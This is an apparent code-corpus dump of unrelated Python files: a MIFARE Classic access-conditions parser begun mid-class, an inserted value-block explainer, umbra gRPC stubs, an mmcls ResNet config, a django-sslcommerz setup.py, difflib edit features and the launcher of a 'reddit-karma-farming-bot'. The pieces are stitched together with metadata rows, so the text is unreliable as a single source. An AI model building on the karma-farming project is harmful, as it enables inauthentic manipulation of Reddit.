            def __init__(self, _io, _parent=None, _root=None):
                self._io = _io
                self._parent = _parent
                self._root = _root if _root else self
                self._debug = collections.defaultdict(dict)

            def _read(self):
                self._debug['raw_chunks']['start'] = self._io.pos()
                self.raw_chunks = [None] * (self._parent.ac_count_of_chunks)
                for i in range(self._parent.ac_count_of_chunks):
                    if not 'arr' in self._debug['raw_chunks']:
                        self._debug['raw_chunks']['arr'] = []
                    self._debug['raw_chunks']['arr'].append({'start': self._io.pos()})
                    self.raw_chunks[i] = self._io.read_bits_int_be(4)
                    self._debug['raw_chunks']['arr'][i]['end'] = self._io.pos()
                self._debug['raw_chunks']['end'] = self._io.pos()

            class TrailerAc(KaitaiStruct):
                SEQ_FIELDS = []

                def __init__(self, ac, _io, _parent=None, _root=None):
                    self._io = _io
                    self._parent = _parent
                    self._root = _root if _root else self
                    self.ac = ac
                    self._debug = collections.defaultdict(dict)

                def _read(self):
                    pass

                @property
                def can_read_key_b(self):
                    """key A is required."""
                    if hasattr(self, '_m_can_read_key_b'):
                        return self._m_can_read_key_b if hasattr(self, '_m_can_read_key_b') else None

                    self._m_can_read_key_b = self.ac.inv_shift_val <= 2
                    return self._m_can_read_key_b if hasattr(self, '_m_can_read_key_b') else None

                @property
                def can_write_keys(self):
                    if hasattr(self, '_m_can_write_keys'):
                        return self._m_can_write_keys if hasattr(self, '_m_can_write_keys') else None

                    self._m_can_write_keys = ((((self.ac.inv_shift_val + 1) % 3) != 0) and (self.ac.inv_shift_val < 6))
                    return self._m_can_write_keys if hasattr(self, '_m_can_write_keys') else None

                @property
                def can_write_access_bits(self):
                    if hasattr(self, '_m_can_write_access_bits'):
                        return self._m_can_write_access_bits if hasattr(self, '_m_can_write_access_bits') else None

                    self._m_can_write_access_bits = self.ac.bits[2].b
                    return self._m_can_write_access_bits if hasattr(self, '_m_can_write_access_bits') else None

                @property
                def key_b_controls_write(self):
                    if hasattr(self, '_m_key_b_controls_write'):
                        return self._m_key_b_controls_write if hasattr(self, '_m_key_b_controls_write') else None

                    self._m_key_b_controls_write = not (self.can_read_key_b)
                    return self._m_key_b_controls_write if hasattr(self, '_m_key_b_controls_write') else None

            class ChunkBitRemap(KaitaiStruct):
                SEQ_FIELDS = []

                def __init__(self, bit_no, _io, _parent=None, _root=None):
                    self._io = _io
                    self._parent = _parent
                    self._root = _root if _root else self
                    self.bit_no = bit_no
                    self._debug = collections.defaultdict(dict)

                def _read(self):
                    pass

                @property
                def shift_value(self):
                    if hasattr(self, '_m_shift_value'):
                        return self._m_shift_value if hasattr(self, '_m_shift_value') else None

                    self._m_shift_value = (-1 if self.bit_no == 1 else 1)
                    return self._m_shift_value if hasattr(self, '_m_shift_value') else None

                @property
                def chunk_no(self):
                    if hasattr(self, '_m_chunk_no'):
                        return self._m_chunk_no if hasattr(self, '_m_chunk_no') else None

                    self._m_chunk_no = (((self.inv_chunk_no + self.shift_value) + self._parent._parent.ac_count_of_chunks) % self._parent._parent.ac_count_of_chunks)
                    return self._m_chunk_no if hasattr(self, '_m_chunk_no') else None

                @property
                def inv_chunk_no(self):
                    if hasattr(self, '_m_inv_chunk_no'):
                        return self._m_inv_chunk_no if hasattr(self, '_m_inv_chunk_no') else None

                    self._m_inv_chunk_no = (self.bit_no + self.shift_value)
                    return self._m_inv_chunk_no if hasattr(self, '_m_inv_chunk_no') else None

            class DataAc(KaitaiStruct):
                SEQ_FIELDS = []

                def __init__(self, ac, _io, _parent=None, _root=None):
                    self._io = _io
                    self._parent = _parent
                    self._root = _root if _root else self
                    self.ac = ac
                    self._debug = collections.defaultdict(dict)

                def _read(self):
                    pass

                @property
                def read_key_a_required(self):
                    if hasattr(self, '_m_read_key_a_required'):
                        return self._m_read_key_a_required if hasattr(self, '_m_read_key_a_required') else None

                    self._m_read_key_a_required = self.ac.val <= 4
                    return self._m_read_key_a_required if hasattr(self, '_m_read_key_a_required') else None

                @property
                def write_key_b_required(self):
                    if hasattr(self, '_m_write_key_b_required'):
                        return self._m_write_key_b_required if hasattr(self, '_m_write_key_b_required') else None

                    self._m_write_key_b_required = (( ((not (self.read_key_a_required)) or (self.read_key_b_required)) ) and (not (self.ac.bits[0].b)))
                    return self._m_write_key_b_required if hasattr(self, '_m_write_key_b_required') else None

                @property
                def write_key_a_required(self):
                    if hasattr(self, '_m_write_key_a_required'):
                        return self._m_write_key_a_required if hasattr(self, '_m_write_key_a_required') else None

                    self._m_write_key_a_required = self.ac.val == 0
                    return self._m_write_key_a_required if hasattr(self, '_m_write_key_a_required') else None

                @property
                def read_key_b_required(self):
                    if hasattr(self, '_m_read_key_b_required'):
                        return self._m_read_key_b_required if hasattr(self, '_m_read_key_b_required') else None

                    self._m_read_key_b_required = self.ac.val <= 6
                    return self._m_read_key_b_required if hasattr(self, '_m_read_key_b_required') else None

                @property
                def decrement_available(self):
                    if hasattr(self, '_m_decrement_available'):
                        return self._m_decrement_available if hasattr(self, '_m_decrement_available') else None

                    self._m_decrement_available = (( ((self.ac.bits[1].b) or (not (self.ac.bits[0].b))) ) and (not (self.ac.bits[2].b)))
                    return self._m_decrement_available if hasattr(self, '_m_decrement_available') else None

                @property
                def increment_available(self):
                    if hasattr(self, '_m_increment_available'):
                        return self._m_increment_available if hasattr(self, '_m_increment_available') else None

                    self._m_increment_available = (( ((not (self.ac.bits[0].b)) and (not (self.read_key_a_required)) and (not (self.read_key_b_required))) ) or ( ((not (self.ac.bits[0].b)) and (self.read_key_a_required) and (self.read_key_b_required)) ))
                    return self._m_increment_available if hasattr(self, '_m_increment_available') else None

            class Ac(KaitaiStruct):
                SEQ_FIELDS = []

                def __init__(self, index, _io, _parent=None, _root=None):
                    self._io = _io
                    self._parent = _parent
                    self._root = _root if _root else self
                    self.index = index
                    self._debug = collections.defaultdict(dict)

                def _read(self):
                    pass

                class AcBit(KaitaiStruct):
                    SEQ_FIELDS = []

                    def __init__(self, i, chunk, _io, _parent=None, _root=None):
                        self._io = _io
                        self._parent = _parent
                        self._root = _root if _root else self
                        self.i = i
                        self.chunk = chunk
                        self._debug = collections.defaultdict(dict)

                    def _read(self):
                        pass

                    @property
                    def n(self):
                        if hasattr(self, '_m_n'):
                            return self._m_n if hasattr(self, '_m_n') else None

                        self._m_n = ((self.chunk >> self.i) & 1)
                        return self._m_n if hasattr(self, '_m_n') else None

                    @property
                    def b(self):
                        if hasattr(self, '_m_b'):
                            return self._m_b if hasattr(self, '_m_b') else None

                        self._m_b = self.n == 1
                        return self._m_b if hasattr(self, '_m_b') else None

                @property
                def bits(self):
                    if hasattr(self, '_m_bits'):
                        return self._m_bits if hasattr(self, '_m_bits') else None

                    _pos = self._io.pos()
                    self._io.seek(0)
                    self._debug['_m_bits']['start'] = self._io.pos()
                    self._m_bits = [None] * (self._parent._parent.ac_bits)
                    for i in range(self._parent._parent.ac_bits):
                        if not 'arr' in self._debug['_m_bits']:
                            self._debug['_m_bits']['arr'] = []
                        self._debug['_m_bits']['arr'].append({'start': self._io.pos()})
                        _t__m_bits = MifareClassic.Trailer.AccessConditions.Ac.AcBit(self.index, self._parent.chunks[i].chunk, self._io, self, self._root)
                        _t__m_bits._read()
                        self._m_bits[i] = _t__m_bits
                        self._debug['_m_bits']['arr'][i]['end'] = self._io.pos()
                    self._debug['_m_bits']['end'] = self._io.pos()
                    self._io.seek(_pos)
                    return self._m_bits if hasattr(self, '_m_bits') else None

                @property
                def val(self):
                    """c3 c2 c1."""
                    if hasattr(self, '_m_val'):
                        return self._m_val if hasattr(self, '_m_val') else None

                    self._m_val = (((self.bits[2].n << 2) | (self.bits[1].n << 1)) | self.bits[0].n)
                    return self._m_val if hasattr(self, '_m_val') else None

                @property
                def inv_shift_val(self):
                    if hasattr(self, '_m_inv_shift_val'):
                        return self._m_inv_shift_val if hasattr(self, '_m_inv_shift_val') else None

                    self._m_inv_shift_val = (((self.bits[0].n << 2) | (self.bits[1].n << 1)) | self.bits[2].n)
                    return self._m_inv_shift_val if hasattr(self, '_m_inv_shift_val') else None

            class ValidChunk(KaitaiStruct):
                SEQ_FIELDS = []

                def __init__(self, inv_chunk, chunk, _io, _parent=None, _root=None):
                    self._io = _io
                    self._parent = _parent
                    self._root = _root if _root else self
                    self.inv_chunk = inv_chunk
                    self.chunk = chunk
                    self._debug = collections.defaultdict(dict)

                def _read(self):
                    pass

                @property
                def valid(self):
                    if hasattr(self, '_m_valid'):
                        return self._m_valid if hasattr(self, '_m_valid') else None

                    self._m_valid = (self.inv_chunk ^ self.chunk) == 15
                    return self._m_valid if hasattr(self, '_m_valid') else None

            @property
            def data_acs(self):
                if hasattr(self, '_m_data_acs'):
                    return self._m_data_acs if hasattr(self, '_m_data_acs') else None

                _pos = self._io.pos()
                self._io.seek(0)
                self._debug['_m_data_acs']['start'] = self._io.pos()
                self._m_data_acs = [None] * ((self._parent.acs_in_sector - 1))
                for i in range((self._parent.acs_in_sector - 1)):
                    if not 'arr' in self._debug['_m_data_acs']:
                        self._debug['_m_data_acs']['arr'] = []
                    self._debug['_m_data_acs']['arr'].append({'start': self._io.pos()})
                    _t__m_data_acs = MifareClassic.Trailer.AccessConditions.DataAc(self.acs_raw[i], self._io, self, self._root)
                    _t__m_data_acs._read()
                    self._m_data_acs[i] = _t__m_data_acs
                    self._debug['_m_data_acs']['arr'][i]['end'] = self._io.pos()
                self._debug['_m_data_acs']['end'] = self._io.pos()
                self._io.seek(_pos)
                return self._m_data_acs if hasattr(self, '_m_data_acs') else None

            @property
            def remaps(self):
                if hasattr(self, '_m_remaps'):
                    return self._m_remaps if hasattr(self, '_m_remaps') else None

                _pos = self._io.pos()
                self._io.seek(0)
                self._debug['_m_remaps']['start'] = self._io.pos()
                self._m_remaps = [None] * (self._parent.ac_bits)
                for i in range(self._parent.ac_bits):
                    if not 'arr' in self._debug['_m_remaps']:
                        self._debug['_m_remaps']['arr'] = []
                    self._debug['_m_remaps']['arr'].append({'start': self._io.pos()})
                    _t__m_remaps = MifareClassic.Trailer.AccessConditions.ChunkBitRemap(i, self._io, self, self._root)
                    _t__m_remaps._read()
                    self._m_remaps[i] = _t__m_remaps
                    self._debug['_m_remaps']['arr'][i]['end'] = self._io.pos()
                self._debug['_m_remaps']['end'] = self._io.pos()
                self._io.seek(_pos)
                return self._m_remaps if hasattr(self, '_m_remaps') else None

            @property
            def acs_raw(self):
                if hasattr(self, '_m_acs_raw'):
                    return self._m_acs_raw if hasattr(self, '_m_acs_raw') else None

                _pos = self._io.pos()
                self._io.seek(0)
                self._debug['_m_acs_raw']['start'] = self._io.pos()
                self._m_acs_raw = [None] * (self._parent.acs_in_sector)
                for i in range(self._parent.acs_in_sector):
                    if not 'arr' in self._debug['_m_acs_raw']:
                        self._debug['_m_acs_raw']['arr'] = []
                    self._debug['_m_acs_raw']['arr'].append({'start': self._io.pos()})
                    _t__m_acs_raw = MifareClassic.Trailer.AccessConditions.Ac(i, self._io, self, self._root)
                    _t__m_acs_raw._read()
                    self._m_acs_raw[i] = _t__m_acs_raw
                    self._debug['_m_acs_raw']['arr'][i]['end'] = self._io.pos()
                self._debug['_m_acs_raw']['end'] = self._io.pos()
                self._io.seek(_pos)
                return self._m_acs_raw if hasattr(self, '_m_acs_raw') else None

            @property
            def trailer_ac(self):
                if hasattr(self, '_m_trailer_ac'):
                    return self._m_trailer_ac if hasattr(self, '_m_trailer_ac') else None

                _pos = self._io.pos()
                self._io.seek(0)
                self._debug['_m_trailer_ac']['start'] = self._io.pos()
                self._m_trailer_ac = MifareClassic.Trailer.AccessConditions.TrailerAc(self.acs_raw[(self._parent.acs_in_sector - 1)], self._io, self, self._root)
                self._m_trailer_ac._read()
                self._debug['_m_trailer_ac']['end'] = self._io.pos()
                self._io.seek(_pos)
                return self._m_trailer_ac if hasattr(self, '_m_trailer_ac') else None

            @property
            def chunks(self):
                if hasattr(self, '_m_chunks'):
                    return self._m_chunks if hasattr(self, '_m_chunks') else None

                _pos = self._io.pos()
                self._io.seek(0)
                self._debug['_m_chunks']['start'] = self._io.pos()
                self._m_chunks = [None] * (self._parent.ac_bits)
                for i in range(self._parent.ac_bits):
                    if not 'arr' in self._debug['_m_chunks']:
                        self._debug['_m_chunks']['arr'] = []
                    self._debug['_m_chunks']['arr'].append({'start': self._io.pos()})
                    _t__m_chunks = MifareClassic.Trailer.AccessConditions.ValidChunk(self.raw_chunks[self.remaps[i].inv_chunk_no], self.raw_chunks[self.remaps[i].chunk_no], self._io, self, self._root)
                    _t__m_chunks._read()
                    self._m_chunks[i] = _t__m_chunks
                    self._debug['_m_chunks']['arr'][i]['end'] = self._io.pos()
                self._debug['_m_chunks']['end'] = self._io.pos()
                self._io.seek(_pos)
                return self._m_chunks if hasattr(self, '_m_chunks') else None

        @property
        def ac_bits(self):
            if hasattr(self, '_m_ac_bits'):
                return self._m_ac_bits if hasattr(self, '_m_ac_bits') else None

            self._m_ac_bits = 3
            return self._m_ac_bits if hasattr(self, '_m_ac_bits') else None

        @property
        def acs_in_sector(self):
            if hasattr(self, '_m_acs_in_sector'):
                return self._m_acs_in_sector if hasattr(self, '_m_acs_in_sector') else None

            self._m_acs_in_sector = 4
            return self._m_acs_in_sector if hasattr(self, '_m_acs_in_sector') else None

        @property
        def ac_count_of_chunks(self):
            if hasattr(self, '_m_ac_count_of_chunks'):
                return self._m_ac_count_of_chunks if hasattr(self, '_m_ac_count_of_chunks') else None

            self._m_ac_count_of_chunks = (self.ac_bits * 2)
            return self._m_ac_count_of_chunks if hasattr(self, '_m_ac_count_of_chunks') else None
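The `ValueBlock` type parsed above relies on MIFARE Classic's value-block redundancy: a 32-bit value stored three times as value / inverted value / value, followed by an address byte stored four times as addr / ~addr / addr / ~addr. A self-contained sketch of that convention (independent of the generated parser; `encode_value_block` and `is_valid_value_block` are illustrative names, and the inversions are masked explicitly to 8/32 bits):

```python
import struct

def encode_value_block(value: int, addr: int) -> bytes:
    """Build a 16-byte MIFARE Classic value block for a u32 value and u8 address."""
    inv_value = ~value & 0xFFFFFFFF  # one's complement, masked to 32 bits
    inv_addr = ~addr & 0xFF          # one's complement, masked to 8 bits
    return struct.pack('<III4B', value, inv_value, value,
                       addr, inv_addr, addr, inv_addr)

def is_valid_value_block(block: bytes) -> bool:
    """Check the same redundancy that ValueBlock.value_valid / addr_valid encode."""
    v0, v1, v2, a0, a1, a2, a3 = struct.unpack('<III4B', block)
    value_valid = v0 == (~v1 & 0xFFFFFFFF) and v0 == v2
    addr_valid = a0 == (~a1 & 0xFF) and a0 == a2 and a1 == a3
    return value_valid and addr_valid

block = encode_value_block(100, 5)
assert len(block) == 16
assert is_valid_value_block(block)
assert not is_valid_value_block(b'\x00' * 16)  # zero block fails the inversion check
```

Note that the sketch masks the `~` results explicitly; the generated properties above compare against Python's signed `~` directly, so when experimenting it is safer to reason with the masked form.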

# umbra/common/protobuf/umbra_grpc.py (serial-coder/umbra, Apache-2.0)
# Generated by the Protocol Buffers compiler. DO NOT EDIT!
# source: umbra.proto
# plugin: grpclib.plugin.main
import abc
import typing

import grpclib.const
import grpclib.client

if typing.TYPE_CHECKING:
    import grpclib.server

import google.protobuf.struct_pb2
import google.protobuf.timestamp_pb2

from umbra.common.protobuf import umbra_pb2


class BrokerBase(abc.ABC):

    @abc.abstractmethod
    async def Execute(self, stream: 'grpclib.server.Stream[umbra_pb2.Config, umbra_pb2.Report]') -> None:
        pass

    @abc.abstractmethod
    async def Collect(self, stream: 'grpclib.server.Stream[umbra_pb2.Stats, umbra_pb2.Status]') -> None:
        pass

    def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
        return {
            '/umbra.Broker/Execute': grpclib.const.Handler(
                self.Execute,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.Config,
                umbra_pb2.Report,
            ),
            '/umbra.Broker/Collect': grpclib.const.Handler(
                self.Collect,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.Stats,
                umbra_pb2.Status,
            ),
        }


class BrokerStub:

    def __init__(self, channel: grpclib.client.Channel) -> None:
        self.Execute = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.Broker/Execute',
            umbra_pb2.Config,
            umbra_pb2.Report,
        )
        self.Collect = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.Broker/Collect',
            umbra_pb2.Stats,
            umbra_pb2.Status,
        )


class ScenarioBase(abc.ABC):

    @abc.abstractmethod
    async def Establish(self, stream: 'grpclib.server.Stream[umbra_pb2.Workflow, umbra_pb2.Status]') -> None:
        pass

    @abc.abstractmethod
    async def Stats(self, stream: 'grpclib.server.Stream[umbra_pb2.Workflow, umbra_pb2.Status]') -> None:
        pass

    def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
        return {
            '/umbra.Scenario/Establish': grpclib.const.Handler(
                self.Establish,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.Workflow,
                umbra_pb2.Status,
            ),
            '/umbra.Scenario/Stats': grpclib.const.Handler(
                self.Stats,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.Workflow,
                umbra_pb2.Status,
            ),
        }


class ScenarioStub:

    def __init__(self, channel: grpclib.client.Channel) -> None:
        self.Establish = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.Scenario/Establish',
            umbra_pb2.Workflow,
            umbra_pb2.Status,
        )
        self.Stats = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.Scenario/Stats',
            umbra_pb2.Workflow,
            umbra_pb2.Status,
        )


class MonitorBase(abc.ABC):

    @abc.abstractmethod
    async def Measure(self, stream: 'grpclib.server.Stream[umbra_pb2.Directrix, umbra_pb2.Status]') -> None:
        pass

    def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
        return {
            '/umbra.Monitor/Measure': grpclib.const.Handler(
                self.Measure,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.Directrix,
                umbra_pb2.Status,
            ),
        }


class MonitorStub:

    def __init__(self, channel: grpclib.client.Channel) -> None:
        self.Measure = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.Monitor/Measure',
            umbra_pb2.Directrix,
            umbra_pb2.Status,
        )


class AgentBase(abc.ABC):

    @abc.abstractmethod
    async def Probe(self, stream: 'grpclib.server.Stream[umbra_pb2.Instruction, umbra_pb2.Snapshot]') -> None:
        pass

    def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
        return {
            '/umbra.Agent/Probe': grpclib.const.Handler(
                self.Probe,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.Instruction,
                umbra_pb2.Snapshot,
            ),
        }


class AgentStub:

    def __init__(self, channel: grpclib.client.Channel) -> None:
        self.Probe = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.Agent/Probe',
            umbra_pb2.Instruction,
            umbra_pb2.Snapshot,
        )


class CLIBase(abc.ABC):

    @abc.abstractmethod
    async def Inform(self, stream: 'grpclib.server.Stream[umbra_pb2.State, umbra_pb2.Status]') -> None:
        pass

    def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
        return {
            '/umbra.CLI/Inform': grpclib.const.Handler(
                self.Inform,
                grpclib.const.Cardinality.UNARY_UNARY,
                umbra_pb2.State,
                umbra_pb2.Status,
            ),
        }


class CLIStub:

    def __init__(self, channel: grpclib.client.Channel) -> None:
        self.Inform = grpclib.client.UnaryUnaryMethod(
            channel,
            '/umbra.CLI/Inform',
            umbra_pb2.State,
            umbra_pb2.Status,
        )
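Every handler key registered in the `__mapping__` methods above, and every route passed to the stubs, follows the standard gRPC path scheme `/<package>.<Service>/<Method>`, which is how a grpclib server matches incoming requests to handlers. A tiny illustrative helper (not part of grpclib; `grpc_path` is a made-up name) showing the convention:

```python
def grpc_path(package: str, service: str, method: str) -> str:
    # gRPC route format: "/<package>.<Service>/<Method>"
    return '/{}.{}/{}'.format(package, service, method)

print(grpc_path('umbra', 'Broker', 'Execute'))  # -> /umbra.Broker/Execute
```

This is why each `Base` class and its matching `Stub` above use string-identical paths: the server registers them, the client dials them.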

# configs_custom/mmcls/dog-vs-cat/resnet50_b32x8.py (apulis/ApulisVision, Apache-2.0)
model = dict(
    type='ImageClassifier',
    backbone=dict(
        type='ResNet',
        depth=50,
        num_stages=4,
        out_indices=(3, ),
        style='pytorch'),
    neck=dict(type='GlobalAveragePooling'),
    head=dict(
        type='LinearClsHead',
        num_classes=1000,
        in_channels=2048,
        loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
        topk=(1, 5)))
dataset_type = 'ImageNet'
img_norm_cfg = dict(
    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='RandomResizedCrop', size=224),
    dict(type='RandomFlip', flip_prob=0.5, direction='horizontal'),
    dict(
        type='Normalize',
        mean=[123.675, 116.28, 103.53],
        std=[58.395, 57.12, 57.375],
        to_rgb=True),
    dict(type='ImageToTensor', keys=['img']),
    dict(type='ToTensor', keys=['gt_label']),
    dict(type='Collect', keys=['img', 'gt_label'])
]
test_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='Resize', size=(256, -1)),
    dict(type='CenterCrop', crop_size=224),
    dict(
        type='Normalize',
        mean=[123.675, 116.28, 103.53],
        std=[58.395, 57.12, 57.375],
        to_rgb=True),
    dict(type='ImageToTensor', keys=['img']),
    dict(type='ToTensor', keys=['gt_label']),
    dict(type='Collect', keys=['img', 'gt_label'])
]
data = dict(
    samples_per_gpu=32,
    workers_per_gpu=2,
    train=dict(
        type='ImageNet',
        data_prefix='data/dog-vs-cat/dog-vs-cat/',
        pipeline=[
            dict(type='LoadImageFromFile'),
            dict(type='RandomResizedCrop', size=224),
            dict(type='RandomFlip', flip_prob=0.5, direction='horizontal'),
            dict(
                type='Normalize',
                mean=[123.675, 116.28, 103.53],
                std=[58.395, 57.12, 57.375],
                to_rgb=True),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='ToTensor', keys=['gt_label']),
            dict(type='Collect', keys=['img', 'gt_label'])
        ]),
    val=dict(
        type='ImageNet',
        data_prefix='data/dog-vs-cat/dogs-vs-cats/val',
        ann_file=None,
        pipeline=[
            dict(type='LoadImageFromFile'),
            dict(type='Resize', size=(256, -1)),
            dict(type='CenterCrop', crop_size=224),
            dict(
                type='Normalize',
                mean=[123.675, 116.28, 103.53],
                std=[58.395, 57.12, 57.375],
                to_rgb=True),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='ToTensor', keys=['gt_label']),
            dict(type='Collect', keys=['img', 'gt_label'])
        ]),
    test=dict(
        type='ImageNet',
        data_prefix='data/dog-vs-cat/dogs-vs-cats/val',
        ann_file=None,
        pipeline=[
            dict(type='LoadImageFromFile'),
            dict(type='Resize', size=(256, -1)),
            dict(type='CenterCrop', crop_size=224),
            dict(
                type='Normalize',
                mean=[123.675, 116.28, 103.53],
                std=[58.395, 57.12, 57.375],
                to_rgb=True),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='ToTensor', keys=['gt_label']),
            dict(type='Collect', keys=['img', 'gt_label'])
        ]))
evaluation = dict(interval=1, metric='accuracy')
optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
lr_config = dict(policy='step', step=[30, 60, 90])
total_epochs = 100
checkpoint_config = dict(interval=1)
log_config = dict(
    interval=500,
    hooks=[dict(type='TextLoggerHook'),
           dict(type='TensorboardLoggerHook')])
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
work_dir = './work_dirs/resnet50_b32x8'
gpu_ids = range(0, 1)
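The `Normalize` step that appears in every pipeline of this config subtracts the per-channel ImageNet mean and divides by the per-channel std given in `img_norm_cfg`. A scalar sketch of that arithmetic (the real mmcls transform operates on whole image arrays; `normalize_pixel` is an illustrative name, not an mmcls API):

```python
MEAN = [123.675, 116.28, 103.53]  # same values as img_norm_cfg above
STD = [58.395, 57.12, 57.375]

def normalize_pixel(rgb):
    # (channel - mean) / std, applied per channel
    return [(c - m) / s for c, m, s in zip(rgb, MEAN, STD)]

# A pixel exactly equal to the mean normalizes to zero in every channel.
print(normalize_pixel([123.675, 116.28, 103.53]))  # -> [0.0, 0.0, 0.0]
```

`to_rgb=True` additionally tells the transform that the loaded image is BGR and must be channel-swapped to RGB before this arithmetic is applied.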

# setup.py (monim67/django-sslcommerz, MIT)
import setuptools
def get_long_description():
    with open("README.md") as file:
        return file.read()


setuptools.setup(
    name="django-sslcommerz",
    version="1.0.0",
    description="Sslcommerz for django.",
    long_description=get_long_description(),
    url="https://github.com/monim67/django-sslcommerz",
    author="Munim Munna",
    author_email="monim67@yahoo.com",
    license="MIT",
    keywords="sslcommerz",
    packages=["django_sslcommerz", "django_sslcommerz.migrations"],
    install_requires=["django>=2.0", "sslcommerz-sdk>=1.0.1"],
    python_requires=">=3",
    package_data={"django_sslcommerz": ["templates/*.html"]},
    include_package_data=True,
    classifiers=[
        "Intended Audience :: Developers",
        "Environment :: Web Environment",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Framework :: Django",
        "Framework :: Django :: 2.0",
        "Framework :: Django :: 3.0",
        "Development Status :: 5 - Production/Stable",
        "License :: OSI Approved :: MIT License",
        "Topic :: Software Development :: Libraries",
        "Topic :: Software Development :: Version Control :: Git",
        "Topic :: Utilities",
    ],
)
| 32.4 | 67 | 0.625772 | 131 | 1,296 | 6.083969 | 0.572519 | 0.100376 | 0.045169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018793 | 0.219907 | 1,296 | 39 | 68 | 33.230769 | 0.769535 | 0 | 0 | 0 | 0 | 0 | 0.523148 | 0.037809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | true | 0 | 0.028571 | 0 | 0.085714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04c12c9b2b21dff7b4710057db02ed0b2f079d26 | 441 | py | Python | src/init.py | sheepsushis/reddit-karma-farming-bot | 5330f820991adc271ae8dddbe233378f1c52acb4 | [
"MIT"
] | null | null | null | src/init.py | sheepsushis/reddit-karma-farming-bot | 5330f820991adc271ae8dddbe233378f1c52acb4 | [
"MIT"
] | null | null | null | src/init.py | sheepsushis/reddit-karma-farming-bot | 5330f820991adc271ae8dddbe233378f1c52acb4 | [
"MIT"
] | 1 | 2021-12-05T07:23:00.000Z | 2021-12-05T07:23:00.000Z | import sys
from logs.logger import log
from utils import check_internet, get_public_ip
import bot
if __name__ == "__main__":
if check_internet() is True:
try:
log.info(f'Internet connection found : {get_public_ip()}')
bot.run()
except KeyboardInterrupt:
# quit
sys.exit()
else:
log.info('Please check your internet connection')
sys.exit()
| 25.941176 | 70 | 0.591837 | 52 | 441 | 4.75 | 0.596154 | 0.105263 | 0.089069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.321995 | 441 | 16 | 71 | 27.5625 | 0.826087 | 0.00907 | 0 | 0.142857 | 0 | 0 | 0.206897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04c9716dc9f82deec6e9854cb99ed45017c28d26 | 946 | py | Python | features/editops.py | snukky/yarescorer | 34650f744187afc06ce57874aff1089878db6e00 | [
"MIT"
] | null | null | null | features/editops.py | snukky/yarescorer | 34650f744187afc06ce57874aff1089878db6e00 | [
"MIT"
] | null | null | null | features/editops.py | snukky/yarescorer | 34650f744187afc06ce57874aff1089878db6e00 | [
"MIT"
] | null | null | null | from base import FeatureBase
from difflib import SequenceMatcher
class FeatureEdits(FeatureBase):
name = 'edits'
desc = 'counts of word-based edit operations'
def run(self, trg, src):
matcher = SequenceMatcher(None, src.split(), trg.split())
ops = [tag for tag, _, _, _, _ in matcher.get_opcodes()]
return "EditIns= {} EditDel= {} EditSub= {}" \
.format(ops.count('insert'),
ops.count('delete'),
ops.count('replace'))
class FeatureChars(FeatureBase):
name = 'charedits'
desc = 'counts of character-based edit operations'
def run(self, trg, src):
matcher = SequenceMatcher(None, src, trg)
ops = [tag for tag, _, _, _, _ in matcher.get_opcodes()]
return "CharIns= {} CharDel= {} CharSub= {}" \
.format(ops.count('insert'),
ops.count('delete'),
ops.count('replace'))
| 32.62069 | 65 | 0.570825 | 98 | 946 | 5.408163 | 0.469388 | 0.090566 | 0.045283 | 0.083019 | 0.566038 | 0.566038 | 0.566038 | 0.566038 | 0.566038 | 0.426415 | 0 | 0 | 0.291755 | 946 | 28 | 66 | 33.785714 | 0.791045 | 0 | 0 | 0.454545 | 0 | 0 | 0.210359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
